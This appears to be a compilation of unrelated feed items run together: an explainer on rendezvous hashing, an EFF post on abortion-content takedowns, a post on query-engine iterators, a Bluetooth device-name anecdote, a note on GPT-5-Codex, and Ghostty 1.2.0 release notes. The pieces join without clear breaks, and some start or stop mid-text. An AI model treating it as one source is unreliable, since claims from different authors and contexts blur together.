Each server is responsible for (approximately) the same number of loads.
Scalability:
We can add and remove servers without too much computational effort.
Lookup Speed:
Given a key, we can quickly identify the correct server.
The set of servers is dynamic in the sense that we are allowed to add or remove servers at any time during the operation of the system.
Introduction to Rendezvous Hashing
When confronted with a load balancing problem, most engineers will pick an algorithm based on consistent hashing. Rendezvous hashing is much less well-known, despite being older than consistent hashing and providing different technical advantages. Why is this so?
The simple answer is that computer science courses often cover consistent hashing without introducing rendezvous hashing, but I think there is a deeper underlying reason for the popularity difference. In 1999, Akamai Technologies hosted the ESPN March Madness games and the movie trailer for
Star Wars: The Phantom Menace
. The trailer was so popular that the traffic crashed the film studio’s website - Akamai’s webcaches were the only way to access the video for several days.
This event generated substantial public interest in Akamai
, and the core component of Akamai’s content delivery network was consistent hashing. Then, the
2007 Dynamo paper from Amazon
touted consistent hashing as an integral part of Amazon’s successful commercial database. I suspect that rendezvous hashing is less popular because it never had the same kind of “killer app” moments.
However, rendezvous hashing is far from obsolete - engineering teams have quietly used the algorithm with great success since 1996. In fact, there seems to be a renewed interest in
rendezvous hashing as an alternative to consistent hashing
. Consistent hashing trades load balancing for scalability and lookup speed, but rendezvous hashing provides an alternative tradeoff that emphasizes equal load balancing. Over the last few years, rendezvous hashing has re-emerged as a
good algorithm to load balance medium-size distributed systems
, where an \(O(N)\) lookup cost is not prohibitive.
Why is it called “Rendezvous Hashing”?
The motivation of
the original 1996 paper
was to provide a way for a data provider to communicate data to a client through a proxy server. To exchange the data, the client and provider meet - or
rendezvous
- at a selected proxy server. Rendezvous hashing is a distributed way for the client and provider to mutually agree on the meeting location.
Rendezvous Hashing Algorithm
The goal of rendezvous hashing is to have good load balancing performance - we want each server to be responsible for about the same number of key-value pairs. One reasonable way to make this happen is for each key to select a server uniformly at random, just like with an ordinary hash table. The trick is that if we simply hash the keys to the servers, all of the hash values change when we modify the number of servers.
Rendezvous hashing provides a clever solution. Rather than pick a single server, each key generates a randomly sorted list of servers and chooses the first server from the list. To guarantee a successful lookup, we must ensure that each key-value pair is managed by the key’s first server choice. I call this property the “first choice” invariant.
If our first choice for a server goes offline, we simply move the key to the second server in the list (which becomes our new first choice). It is easy to see that we only need to move the keys that were previously managed by the server that went offline. The rest of the keys do not need to move, since they are still managed by their first choice. For example, if we were to delete server S2 in the example, the items in S2 would move to their new first choices: S1 and S3. None of the other items have to move though, since S2 wasn’t their first choice.
One Weird Hashing Trick
To use rendezvous hashing, each key needs its own unique server priority list. How do we generate a random permutation of servers for each key?
It turns out that we can directly apply a common hashing technique to permute a set of items.
1
First, we hash each server to get a set of integer hash values. Then, we sort the servers based on the hash values. The result is a randomly permuted list of servers. To ensure that each key gets a unique permutation, we also have to make the hash function depend on the key. But this is not difficult - the solution is to concatenate the key with each server or to use the server ID as a hash seed.
The final rendezvous hashing algorithm goes like this, as sketched in code after the list:
Hash all possible key-server combinations with a random hash function
Assign the key to the server with the largest hash value
Maintain the “first choice” invariant when adding and removing servers
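Here is a minimal Python sketch of the algorithm, using SHA-256 as a stand-in for the random hash function (the function names are illustrative):
import hashlib
def score(key, server):
    # Hash the key-server combination down to a 64-bit integer.
    digest = hashlib.sha256(f"{key}:{server}".encode()).digest()
    return int.from_bytes(digest[:8], "big")
def owner(key, servers):
    # The key's "first choice": the server with the largest hash value.
    return max(servers, key=lambda s: score(key, s))
Lookup examines every key-server pair, and removing a server reassigns only the keys whose first choice it was.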
Advantages of Rendezvous Hashing
Cascaded Failover:
When a server fails, many load balancing algorithms forward all of the load to a single server. This can lead to
cascaded failure
if the failover server cannot handle the new load. Rendezvous hashing avoids this problem because each key potentially has a different second-choice server. With a sufficiently good hash function,
2
the load from a failing server is evenly distributed across the remaining servers.
Weighted Servers:
In some situations, we want to do biased load balancing rather than uniform random key assignment. For example, some servers might have larger capacity and should therefore be selected more often. Rendezvous hashing accommodates weighted servers in a very elegant way. Instead of sorting the servers based on their hash values, we rank them based on \(-\frac{w_i}{\ln h_i(x)}\), where \(x\) is the key, \(w_i\) is the weight associated with server \(i\), and \(h_i(x)\) is the hash value (normalized to [0,1]). For more details, see
Jason Resch’s slides from SDC 2015
.
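Continuing the sketch above (an illustration of the formula, not Resch's exact code), only the ranking function changes; the 64-bit hash is normalized into the open interval (0, 1):
import math
def weighted_owner(key, weights):
    # weights maps server id -> w_i; rank servers by -w_i / ln(h_i(x)).
    def weighted_score(server):
        h = (score(key, server) + 0.5) / 2.0**64  # normalize to (0, 1)
        return -weights[server] / math.log(h)
    return max(weights, key=weighted_score)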
Lightweight Memory:
We only need a list of server identifiers to locate the server that manages a given key-value pair, since we can locally compute all of the hash function values. In practice, algorithms such as consistent hashing require more memory (but less computation).
Disadvantages of Rendezvous Hashing
Adding Servers:
It is hard to maintain the “first choice” invariant when adding servers because the new server might become the first choice for a key that is already in the system. To maintain the invariant, we would have to verify that all of the keys in the system are managed by the correct server. This is a serious problem for distributed storage and pub/sub systems because they route users to resources that are distributed throughout the system. If we break the invariant, we break the ability to locate resources (values) in the system.
However, this is not a problem for cache systems. In a cache system, users access data through fast, local servers that have shared access to a slow central data storage repository. When a user requests data from the system, we query the cache to see whether a local copy is available. If the cache doesn’t have a copy, we fetch the data from the central repository and cache it for next time.
We do not have to worry about adding servers to a cache because the system will eventually satisfy the “first choice” invariant by itself. If we add a server that becomes the first choice for an existing key, the new server will simply load the corresponding data after the first unsuccessful cache request. Now that the new server is responsible for the key, the old server that previously managed the key will no longer receive any more requests for the data. Since most caches evict data on an LRU (least recently used) basis, we will eventually flush any stale data copies from the system. This effectively implements the “first choice” invariant without requiring any effort.
Query Time:
If we have \(N\) servers, the lookup algorithm is \(O(N)\) because we have to examine all of the key-server combinations. Consistent hashing is \(O(\log N)\) and can be much faster when \(N\) is large enough.
Conclusion
Rendezvous hashing is a good way to do distributed load balancing for small to medium-sized distributed caches. If working with a system that does not eventually satisfy the “first choice” invariant, rendezvous hashing will require some care when scaling up the number of servers.
California reached the unthinkable: A union deal with tech giants
Our Stop Censoring Abortion Campaign Uncovers a Social Media Censorship Crisis
Electronic Frontier Foundation
www.eff.org
2025-09-15 20:07:16
This is the first installment in a blog series documenting EFF's findings from the Stop Censoring Abortion campaign. You can read additional posts here.
We’ve been hearing that social media platforms are censoring abortion-related content, even when no law requires them to do so. Now, we’ve got the...
This is the first installment in a blog series documenting EFF's findings from the
Stop Censoring Abortion
campaign. You can read additional posts
here
.
We’ve been hearing that social media platforms are censoring abortion-related content, even when no law requires them to do so. Now, we’ve got the receipts.
For months, EFF has been investigating stories from users whose abortion-related content has been taken down or otherwise suppressed by major social media platforms. In collaboration with our allies—including
Plan C
,
Women on Web
,
Reproaction
, and
Women First Digital
—we launched the
#StopCensoringAbortion campaign
to collect and amplify these stories.
Submissions came from a variety of users, including personal accounts, influencers, healthcare clinics, research organizations, and advocacy groups from across the country and abroad—a spectrum that underscores the wide reach of this censorship. Since the start of the year, we’ve seen nearly 100 examples of abortion-related content taken down by social media platforms.
We analyzed these takedowns, deletions, and bans, comparing the content to what platform policies allow—particularly those of Meta—and found that
almost none of the submissions we received violated any of the platforms’ stated policies.
Most of the censored posts simply provided factual, educational information. This Threads post is a perfect example:
Screenshot submitted by Lauren Kahre to EFF
In this post, health policy strategist Lauren Kahre discussed abortion pills’ availability via mail. She provided factual information about two FDA approved medications (mifepristone and misoprostol), including facts like shelf life and how to store pills safely.
Lauren’s post doesn’t violate any of Meta’s policies and shouldn’t have been removed. But don’t just take our word for it:
Meta has publicly insisted that posts like these should
not
be censored.
In a
February 2024 letter to Amnesty International
, Meta Human Rights Policy Director Miranda Sissons wrote: “Organic content (i.e., non paid content) educating users about medication abortion is allowed and does not violate our Community Standards. Additionally, providing guidance on legal access to pharmaceuticals is allowed.”
Still, shortly after Lauren shared this post, Meta took it down. Perhaps even more perplexing was their explanation for doing so. According to Meta, the post was removed because “
[they] don’t allow people to buy, sell, or exchange drugs that require a prescription from a doctor or a pharmacist.”
Screenshot submitted by Lauren Kahre to EFF
In the submissions we received, this was the most common reason Meta gave for removing abortion-related content. The company frequently claimed that posts violated
policies on Restricted Goods and Services
,
which prohibit any “attempts to buy, sell, trade, donate, gift or ask for pharmaceutical drugs.”
Yet in Lauren’s case and others,
the posts very clearly did no such thing.
And as
Meta itself has explained
: “Providing guidance on how to legally access pharmaceuticals is permitted as it is
not
considered an offer to buy, sell or trade these drugs.”
In fact, Meta’s policies on Restricted Goods & Services further state: “We allow discussions about the sale of these goods in stores or by online retailers, advocating for changes to regulations of goods and services covered in this policy, and advocating for or concerning the use of pharmaceutical drugs in the context of medical treatment, including discussion of physical or mental side effects.” Also, “Debating or advocating for the legality or discussing scientific or medical merits of prescription drugs is allowed. This includes news and public service announcements.”
Over and over again, the policies say one thing, but the actual enforcement says another.
We spoke with multiple Meta representatives to share these findings. We asked hard questions about their policies and the gap between how they’re being applied. Unfortunately, we were mostly left with the same concerns, but we’re continuing to push them to do better.
In the coming weeks, we will share a series of blogs further examining trends we found, including stories of unequal enforcement, where individuals and organizations needed to rely on internal connections at Meta to get wrongfully censored posts restored; examples of account suspensions without sufficient warnings; an exploration of Meta’s ad policies; practical tips for users to avoid being censored; and concrete steps platforms should take to reform their abortion content moderation practices. For a preview, we’ve already shared some of our findings with
Barbara Ortutay at The Associated Press
, whose
report
on some of these takedowns was published today
.
We hope this series highlighting examples of abortion content censorship will help the public and the platforms understand the breadth of this problem, who is affected, and with what consequences. These stories collectively underscore the urgent need for platforms to review and consistently enforce their policies in a fair and transparent manner.
With
reproductive rights under attack
both in the U.S. and abroad, sharing accurate information about abortion online has never been more critical. Together, we can hold platforms like Meta accountable, demand transparency in moderation practices, and ultimately stop the censorship of this essential, sometimes life-saving information.
Let's write a super simple query engine using the iterator model. Something like this is conceptually what the compilation target for something like SQL generally looks like.
Our iterators will be
next
able, and return
None
when they're exhausted. We can construct an iterator over some fixed set of values easily:
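A minimal sketch in Python (the class name Scan and the exact shape are assumptions):
class Scan:
    # Iterate over a fixed list of rows; return None once exhausted.
    def __init__(self, rows):
        self.rows = rows
        self.i = 0
    def next(self):
        if self.i >= len(self.rows):
            return None
        row = self.rows[self.i]
        self.i += 1
        return row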
Of course, the value of this model is that it's composable: we can derive iterators from other iterators, like having a
Filter
iterator that only allows rows through meeting some predicate:
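A sketch in the same style (again, the name is illustrative):
class Filter:
    # Pass through only the rows that satisfy the predicate.
    def __init__(self, source, predicate):
        self.source = source
        self.predicate = predicate
    def next(self):
        while True:
            row = self.source.next()
            if row is None or self.predicate(row):
                return row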
Another useful primitive for such a query engine to have is a
product
operator, which takes two iterators and emits their cross product. This is actually a little trickier than it might seem, because we have no way to reverse our iterators: we can only
next
them. This means we have to buffer up the rows from the left iterator so that we can maintain a pointer into it, but this isn't a big deal:
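One way to write it, consistent with the buffering discussion that follows (a sketch, not the author's exact code):
class Product:
    # Cross product. We can't rewind iterators, so buffer the whole left
    # side up front and replay it for each row of the right side.
    def __init__(self, left, right):
        self.left_rows = []
        row = left.next()
        while row is not None:
            self.left_rows.append(row)
            row = left.next()
        self.right = right
        self.right_row = right.next()
        self.i = 0
    def next(self):
        if self.right_row is None or not self.left_rows:
            return None
        if self.i == len(self.left_rows):
            # Finished a pass over the left side; advance the right side.
            self.i = 0
            self.right_row = self.right.next()
            if self.right_row is None:
                return None
        pair = (self.left_rows[self.i], self.right_row)
        self.i += 1
        return pair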
One observation we might have without thinking too hard is that we need not be restricted to our relations being
finite
here. We could write the following iterator:
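A sketch of such an iterator, along with the concatenating union the next paragraph critiques (both reconstructions are assumptions):
class NatIter:
    # An infinite relation: the natural numbers 0, 1, 2, ...
    def __init__(self):
        self.n = 0
    def next(self):
        n = self.n
        self.n += 1
        return n
class UnionIter:
    # Union by concatenation: drain the first iterator, then the second.
    def __init__(self, first, second):
        self.first = first
        self.second = second
    def next(self):
        row = self.first.next()
        if row is not None:
            return row
        return self.second.next()
neg = Scan([-1, -2, -3])           # stands in for an iterator of negatives
union = UnionIter(NatIter(), neg)  # next() yields 0, 1, 2, ... and never -1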
That seems...probably wrong. The issue is with our implementation of
UnionIter
: we're only looking at the second iterator once our first iterator is completely exhausted, which, in this case, since the first iterator is infinite, will never happen!
There's a way to make precise the fact that this implementation is wrong: when we take the union of two iterators, we want it to be true that
if we would eventually get
x
by calling
next
on one of the iterators in isolation, we should eventually get
x
by calling
next
on the union
. The reason this is a useful correctness condition is because it suggests that nothing can be "infinitely delayed." If there's something we need to hit, then we are assured that if we go long enough, we will hit it.
It's easy to see that this condition is not true for our current implementation of union: if we called
next
on
neg
, we would immediately hit
-1
, but calling
next
on our union, we will never get it.
This is easy to fix by changing the implementation of union to interleave the two iterators, rather than concatenate them:
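A sketch of the interleaving fix, plus the product-of-naturals attempt that the next paragraph describes (reconstructions under the same assumed shape):
class UnionIter:
    # Union by interleaving: alternate turns so that neither input can
    # be infinitely delayed by the other.
    def __init__(self, first, second):
        self.first = first
        self.second = second
        self.use_first = True
    def next(self):
        a, b = (self.first, self.second) if self.use_first else (self.second, self.first)
        self.use_first = not self.use_first
        row = a.next()
        if row is not None:
            return row
        return b.next()  # fall back if the side whose turn it is has run dry
# pairs = Product(NatIter(), NatIter())  # hangs: the constructor tries to buffer all of NatIter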
Our program doesn't even run: we're trying to buffer all of
NatIter
, which will never finish. But, even if we could solve that problem, we would still have another: the intention for
product
is that we enumerate every pair between the two inputs, and we can visualize this by an infinite two-dimensional grid:
The problem is that the way our program works now, we will only enumerate along the leftmost arrow, and never see anything to the right of it.
We can borrow another trick from the theory of countable sets to solve this.
The problem right now is that we've divided this infinite grid up into an infinite set of infinite columns. Which means that if we want to enumerate all of the cells, we must first enumerate all of a column, which is, again, infinite. A better (and common, in this world) thing to do is to break up the grid into an infinite list of finite
diagonals
:
If we go through each diagonal in turn, we're guaranteed that we'll hit every square eventually.
For our purposes it will be a little simpler to traverse the grid like this, by continually growing rectangles, but the result is the same:
It's a little ugly to implement this traversal, so I'm going to hide my implementation behind a
gist link
; if you have a really nice way, let me know. The result is that we can iterate over our joined natural number relations just fine.
Some time ago, people noticed that buried in the Windows Bluetooth drivers is the hard-coded name of the Microsoft Wireless Notebook Presenter Mouse 8000. What’s going on there? Does the Microsoft Wireless Notebook Presenter Mouse 8000 receive favorable treatment from the Microsoft Bluetooth drivers? Is this some sort of collusion?
Most of the time, the code to compensate for these types of errors doesn’t betray its presence in the form of hard-coded strings. Instead, you have “else” branches that secretly repair or ignore corrupted values.
Unfortunately, the type of mistake that the Microsoft Wireless Notebook Presenter Mouse 8000 made is one that is easily exposed via strings, because they messed up their string!
The device local name string is
specified to be encoded in UTF-8
. However, the Microsoft Wireless Notebook Presenter Mouse 8000 reports its name as
Microsoft
⟪AE⟫
Wireless Notebook Presenter Mouse 8000
, encoding the registered trademark symbol ® not as UTF-8 as required by the specification but in code page 1252. What’s even worse is that a bare
⟪AE⟫
is not a legal UTF-8 sequence, so the string wouldn’t even show up as corrupted; it would get rejected as invalid.
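The mismatch is easy to reproduce: ® is U+00AE, which is two bytes (0xC2 0xAE) in UTF-8 but the single byte 0xAE in code page 1252. A quick Python sketch:
name = "Microsoft® Wireless Notebook Presenter Mouse 8000"
raw = name.encode("cp1252")  # how the device encodes its name: ® becomes a bare 0xAE byte
raw.decode("utf-8")          # raises UnicodeDecodeError: 0xAE is not a valid UTF-8 start byte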
Thanks, Legal Department, for sticking a ® in the descriptor and messing up the whole thing.
There is a special table inside the Bluetooth drivers of “Devices that report their names wrong (and the correct name to use)”. If the Bluetooth stack sees one of these devices, and it presents the wrong name, then the correct name is substituted.
That table currently has only one entry.
Author
Raymond has been involved in the evolution of Windows for more than 30 years. In 2003, he began a Web site known as The Old New Thing which has grown in popularity far beyond his wildest imagination, a development which still gives him the heebie-jeebies. The Web site spawned a book, coincidentally also titled The Old New Thing (Addison Wesley 2007). He occasionally appears on the Windows Dev Docs Twitter account to tell stories which convey no useful information.
GPT‑5-Codex and upgrades to Codex
Simon Willison
simonwillison.net
2025-09-15 19:55:35
GPT‑5-Codex and upgrades to Codex
OpenAI half-released a new model today: GPT‑5-Codex, a fine-tuned GPT-5 variant explicitly designed for their various AI-assisted programming tools.
I say half-released because it's not yet available via their API, but they "plan to make GPT‑5-Codex available in the...
GPT‑5-Codex and upgrades to Codex
. OpenAI half-released a new model today: GPT‑5-Codex, a fine-tuned GPT-5 variant explicitly designed for their various AI-assisted programming tools.
I say half-released because it's not yet available via their API, but they "plan to make GPT‑5-Codex available in the API soon".
At this point it's best to think of
Codex
as OpenAI's brand name for their coding family of models and tools.
The new model is already integrated into their VS Code extension, the Codex CLI and their Codex Cloud asynchronous coding agent. I'd been calling that last one "Codex Web" but I think Codex Cloud is a better name since it can also be accessed directly from their iPhone app.
Codex Cloud also has a new feature: you can configure it to automatically run code review against specific GitHub repositories (I found that option on
chatgpt.com/codex/settings/code-review
) and it will create a temporary container to use as part of those reviews. Here's the
relevant documentation
.
Some documented features of the new GPT-5-Codex model:
Specifically trained for code review, which directly supports their new code review feature.
"GPT‑5-Codex adapts how much time it spends thinking more dynamically based on the complexity of the task." Simple tasks (like "list files in this directory") should run faster. Large, complex tasks should use run for much longer - OpenAI report Codex crunching for seven hours in some cases!
Increased score on their proprietary "code refactoring evaluation" from 33.9% for GPT-5 (high) to 51.3% for GPT-5-Codex (high). It's hard to evaluate this without seeing the details of the eval but it does at least illustrate that refactoring performance is something they've focused on here.
"GPT‑5-Codex also shows significant improvements in human preference evaluations when creating mobile websites" - in the past I've habitually prompted models to "make it mobile-friendly", maybe I don't need to do that any more.
"We find that comments by GPT‑5-Codex are less likely to be incorrect or unimportant" - less unimportant comments in code is definitely an improvement!
Theo Browne
has a video review
of the model and accompanying features. He was generally impressed but noted that it was surprisingly bad at using the Codex CLI search tool to navigate code. Hopefully that's something that can be fixed with a system prompt update.
Finally, can it draw a pelican riding a bicycle? Without API access I instead got Codex Cloud to
have a go
by prompting:
Generate an SVG of a pelican riding a bicycle, save as pelican.svg
Ghostty 1.2.0 features
6 months of work
with changes from
149 contributors
over
2,676 commits
. Thank you to all the contributors,
maintainers, community moderators, translators, packagers, and users
who each helped make this release possible. This release contains major
improvements to every part of Ghostty, including hundreds of bug fixes.
macOS:
GHSA-q9fg-cpmh-c78x
.
Fixed an issue where Ghostty can be used as a vector for privilege
escalation from other vulnerable or malicious sources. This requires a
vulnerable application outside of Ghostty to initiate this chain of events.
As such, this is considered a low risk advisory.
On macOS, Ghostty 1.2 ships with a new macOS Tahoe compatible icon shown
below. This icon is built with the new Icon Composer application and allows
the icon to work with all of the new macOS light, dark, translucent, and
custom tinting styles.
On GTK (Linux and FreeBSD), Ghostty 1.2 ships with a new icon that better
matches
many
desktop environments. We chose to align with the GNOME styling
since that is common and doesn't generally look out of place in most
environments.
It's impossible to make a perfect, globally consistent icon for the Linux and
BSD ecosystem due to the diversity of desktop environments. We believe this
icon looks better in more environments than the prior icon, and avoids the criticism that the prior icon reflected a macOS-centric point of view.
Ghostty now has a command palette that can invoke most keybind actions,
such as creating new terminals, moving focus, changing text selection,
copy and paste, etc.
The command palette is bound by default to
ctrl+shift+p
on GTK and
cmd+shift+p
on macOS. This can be rebound to any keybind using the
toggle_command_palette
keybind action. The command palette is also available
via the menubar on both macOS and GTK.
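For example, a hypothetical rebinding in the Ghostty configuration (the key choice is purely illustrative):
# Rebind the command palette toggle
keybind = ctrl+shift+k=toggle_command_palette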
The command palette exposes almost every available keybind. As new keybind
actions are added to Ghostty, they will be automatically available in the
command palette as well. This has some immediate benefits, namely that you can
access keybind actions even if they aren't bound to a keybind. This is useful
for infrequently used actions.
For example, I personally find myself using the
move_tab
action via the
command palette frequently, but not frequently enough to justify binding it.
In future versions of Ghostty, we'll continue to expand the features that
are available in the command palette. For example, we're working on a new
terminal sequence specification that would allow terminal programs to expose
any of their actions directly in the command palette (e.g. imagine Neovim
commands being fully available in the command palette).
A new configuration
quick-terminal-size
can now configure the default size
of the quick terminal. This was one of the most highly requested features.
The
quick-terminal-size
configuration supports both percentage and pixel
size. If you specify only one value, it specifies the size of the primary
axis (depending on the location). If you specify two values, then the second
value is the secondary axis. The example below illustrates:
# Percentage, primary axis only
quick-terminal-size = 25%
# Pixels work too, primary axis only
quick-terminal-size = 600px
# Two values specify primary and secondary axis
quick-terminal-size = 25%,75%
# You can also mix units
quick-terminal-size = 300px,80%
The
primary axis
is defined by the
quick-terminal-position
configuration.
For the
top
and
bottom
values, the primary axis is the height. For
the
left
and
right
values, the primary axis is the width. For
center
,
it depends on your monitor orientation: it is height for landscape and width for
portrait.
Beyond simply specifying the size, the quick terminal is now resizable at
runtime and will remember that size for the duration that Ghostty is running.
In prior versions, the size was fixed, which caused real problems depending
on monitor size and resolution.
Screenshots with a couple examples on GTK are shown below:
Ghostty now has opt-in shell integration features to make Ghostty more
compatible with SSH for remote machines that haven't updated to support
Ghostty's terminfo
.
The new
ssh-env
opt-in feature will automatically set the
TERM
variable
to
xterm-256color
for SSH sessions (as well as forward some other
environment variables to make sessions work better). While not strictly correct,
this band-aid solution helps more than it hurts in most cases.
The new
ssh-terminfo
opt-in feature will automatically copy the Ghostty
terminfo to the remote machine so that the proper
xterm-ghostty
TERM
setting can be used and remote programs can take full advantage of all of
Ghostty's features (and avoid xterm features we don't support).
Both of these features are opt-in because they require overriding the
ssh
command in your shell. This operation is not without risk, so we want to make
sure users are aware of what they're doing. We do our best to make this
stable and reliable, but there are edge cases we can't account for. As such,
this is still a work-in-progress and we welcome feedback.
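Based on the naming above, opting in to both likely looks something like this in the configuration (the exact option name is an assumption; check the shell integration documentation):
# Opt in to the SSH integration features
shell-integration-features = ssh-env,ssh-terminfo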
The renderer backends have been reworked so that the core logic is shared,
whether rendering with OpenGL or Metal. This change will allow for quicker
improvements to that area of the code in the future, and will also help to
ensure feature parity between the two backends, which is something that was
starting to become an issue as many features were implemented for Metal but
not for OpenGL.
In the process of this rework, several improvements were made for the OpenGL
backend, which should now be more efficient and has near feature parity with
the Metal backend.
This means that Linux users will now see proper linear alpha blending, which
removes artifacts seen around the edges of text with certain combinations of
background and foreground color. The default
alpha-blending
configuration
value on Linux is now
linear-corrected
, which performs linear blending with
a correction step for text so that the apparent weight matches the non-linear
blending that people are used to.
This rework also made it so that custom shaders can now be hot reloaded.
Custom shaders are now provided information about the terminal cursor, so that
custom effects and animations can be applied to it, like a trail or smear.
The example below shows a
"cursor blaze" shader
that leaves a trail behind the cursor as it moves:
Cursor shaders and custom shaders in general are not for everyone, but
we've seen some incredibly creative shaders from the community. A lot of
people are having a lot of fun, and beyond simple eye candy they can be
practically useful too, such as making the cursor easier to follow as it
moves (but perhaps less loudly).
We do eventually plan to add a first-party animated cursor, so that users don't
need to take on the additional performance cost of a custom shader just to have
a cursor that's easier to follow as it moves, but adding this feature to custom
shaders was an easy stop-gap measure. Plus, this will still be useful even after
we add the first-party animated cursors, since some users may still want to have
very specific custom effects that aren't possible through the built-in option.
You can now specify a background image for your terminal using the
background-image
configuration. This comes with a set of other
configurations so that the image appears just how you'd like it:
background-image-opacity
,
background-image-position
,
background-image-fit
, and
background-image-repeat
.
In Ghostty 1.2.0, the background image is duplicated in VRAM for each
terminal. For sufficiently large images and many terminals, this can lead to a
large increase in memory usage (specifically VRAM). A future Ghostty release
will share image textures across terminals to avoid this issue.
As far as we know, Ghostty is the first terminal emulator on macOS to support this feature; multiple terminals on Linux and Windows already support it.
Progress bars can show success/error states, numerical progress towards
completion, indeterminate progress (pulsing), and more. Programs like
Amp
are already utilizing the progress bar today to
show activity, as shown below:
Graphical progress bars are now supported by multiple terminals across Windows,
Linux, and macOS as well as a handful of major terminal programs such as
the systemd and Zig CLIs. We hope, given the growing terminal support, that more
programs will start using this feature.
Today, Ghostty shows a simple, basic progress bar at the top of the terminal.
In future versions, we will expand progress so it is shown in tab headers,
task bars, dock icons, etc.
The progress report
OSC 9;4
sequence collides with the iTerm2 notification
sequence. Ghostty is the only emulator to support both sequences. To handle
this,
OSC 9;4
always parses as a progress report, meaning notifications whose text starts with
;4
cannot be delivered. We think this is a
reasonable trade-off given the extremely specific text and the wider support
for the more recommended
OSC 777
notification sequence.
When the font(s) you configured for Ghostty don't have a glyph for a character
we need to render, we find a font on the system that does. These fonts are now
adjusted in size to better match the primary font. This is similar (but
not identical) to
font-size-adjust
in CSS
.
This helps account for the differing sizes of fonts, and creates a generally
more consistent appearance. This is also helpful for users who use multiple
writing systems; for example, CJK (Chinese, Japanese, and Korean) text now
avoids having large vertical "gutters" between characters.
Ghostty 1.1.3 (Old)
Ghostty 1.2.0 (New)
The difference in the example above is subtle; it is more apparent when many differing font faces are used in a single line. To ensure we were
on the right path, we also polled a number of Chinese readers within
the community and feedback leaned strongly positive towards the new behavior.
In the future, we plan to rework font configuration so that you can specify
sizes per-font, or let a configured font be sized automatically like fallback
fonts are.
A variety of new characters are now drawn directly by Ghostty instead of having
to rely on a font for them. We draw glyphs directly so that we can ensure they
align correctly with the cell and each other.
An example of just a fraction of the newly supported glyphs is shown below.
Notice how the glyphs align perfectly with each other along the cell edges
with no gaps in between. This kind of pixel-perfect rendering is very important
for TUI applications that use glyphs such as these for UI elements.
Ghostty 1.1.3 (Old)
Ghostty 1.2.0 (New)
PRs:
#7809
, and subsequent PRs to fix minor issues
The built-in Nerd Font symbols are now provided by a standalone symbols-only
font, rather than using patched versions of JetBrains Mono in Regular, Bold,
Italic, and Bold Italic styles, and the built-in JetBrains Mono now uses a
variable font rather than 4 static ones. This makes it so that the embedded
fonts in Ghostty take significantly less space than they used to.
This also means we're now using a more up-to-date copy of the Nerd Fonts
symbols, so newer symbols will now render correctly.
The big change, however, is that Ghostty now automatically resizes Nerd Fonts
symbols to match the cell size, in the same way that the official Nerd Fonts
patcher does, which means that the experience of using Ghostty with a normal
un-patched font should be nearly or completely identical to using it with a
patched font before.
This means that there is now
no reason
to use patched fonts in Ghostty, since
things like powerline glyphs will always be scaled appropriately for the cell
size either way.
We've reworked our keybindings to be more consistent, based on the
W3C key event code specification
.
This work should result in more predictable, working keybindings across
operating systems and keyboard layouts, but also brings with it some
major behavior changes that may break existing keybindings.
All single codepoint characters now match the character produced by the
keyboard layout (i.e. are layout-dependent). So
ctrl+c
matches the
physical "c" key on a US standard keyboard with a US layout, but matches
the "i" key on a Dvorak layout. This also works for international characters.
Codepoints are case-insensitive and match via Unicode case folding (this is
how both Windows and macOS treat keyboard shortcuts).
All other key names match physical keys, and the key names are named
according to the W3C key codes. Example:
ctrl+KeyA
will always match the "a"
key on a US physical layout (the name
KeyA
lining up with US keyboards is
mandated by the spec, not us). Note when we say "physical" here we mean the
keycode sent by the OS or GUI framework; these can often be overridden
using programs to remap keys at the "hardware" level but software layouts
do not do this.
As a result of the above,
the
physical:
prefix has been removed.
Physical keybinds are now explicit through the use of multi-codepoint key
names as noted above. Previous
physical:
keybinds continue to work but
should be updated to the new format.
For backwards compatibility, all existing key names in Ghostty that didn't
match W3C map to their W3C equivalent. For example,
grave_accent
maps to
backquote
.
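Putting these rules together, a couple of hypothetical keybinds illustrating layout-dependent versus physical matching (the actions are chosen for illustration):
# Matches whatever key produces "c" in the active layout
keybind = ctrl+c=copy_to_clipboard
# Always matches the physical key in the US-layout "A" position
keybind = ctrl+KeyA=new_window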
Ghostty on both macOS and GTK support the terminal bell (ASCII
BEL
or
0x07
). Ghostty's behavior when the bell is rung can be customized using
the
bell-features
configuration. We've shipped with defaults which we believe
are the least intrusive while still being useful, and more intrusive optional
features can be set with
bell-features
.
On macOS, the bell by default will put the bell emoji (🔔) in the title of
the terminal, will bounce the dock icon once, and will put a badge on the
Ghostty icon visible in the dock and application switcher. No audio will be
played.
On GTK, the bell by default will put the bell emoji (🔔) in the title of
the terminal and will mark the window as requesting attention. The exact
behavior of "requesting attention" is determined by the window manager or
desktop environment. No audio will be played.
GTK also supports an audio bell feature which is off by default. This can be
enabled with
bell-features=audio
. You can even specify custom audio to
play using the
bell-audio-path
configuration. The
bell-features=system
feature (default off) will use the "system beep" which usually can be audio
as well, configured via a central system setting.
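For example, an opt-in audio bell with a custom sound might be configured like this (the path is illustrative):
bell-features = audio
bell-audio-path = ~/sounds/bell.wav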
GTK also supports a border flashing animation that can be enabled with
bell-features=border
. This is similar to the "visual bell" feature provided
by other terminal emulators.
A future version of Ghostty will bring parity to macOS with all the bell
features.
Ghostty 1.2 includes dozens of improvements to core terminal emulation to
ensure terminal programs work consistently and correctly in Ghostty as they
do in other terminal emulators. You can find the full list of related changes
in the
terminal capabilities
section.
The improvements range from very minor (
#7443
, a sequence not used by any
known program in the wild) to very important (
#8590
, which broke some real
programs). In any case, Ghostty takes terminal emulation compatibility very
seriously and we work hard to ensure that Ghostty can support the wide
spectrum of terminal features that exist.
Getting this right is easier said than done: a very small subset of terminal
emulation functionality is formally specified, with the vast majority
being defined by de facto standards based on how terminal emulators behave.
Additionally, since no singular standards body exists, protocols often
conflict with each other and we're left determining which protocol is more
important or how we can compromise to support both.
For example, the
progress bars
sequence
collides with the iTerm2 desktop notification sequence. As a compromise,
any unambiguous progress bar sequence takes priority over notifications,
so if you send a notification whose text exactly matches a progress bar sequence, it will not work. This is a compromise Ghostty made
so that we can be one of the only terminals to support both progress bars
and iTerm2 desktop notifications.
1
Ghostty 1.2 adds support for macOS 26 (Tahoe).
When running on macOS 26, Ghostty will use the new Liquid Glass style. The
app icon has been updated
to support macOS 26 features such as light, dark, tinting, etc.
A number of UI details have been updated to better match the new macOS style,
such as icons in menu bars. In addition to visual support, a number of
compatibility issues were also fixed.
Ghostty 1.2 remains fully compatible with prior macOS versions back to
and including macOS 13 (Ventura).
Ghostty 1.1.x is functional on macOS 26. Due to the way macOS SDKs work,
Ghostty 1.1.x will use the old pre-Tahoe UI styling. There are still some
compatibility issues, but it is largely functional if you are unable to
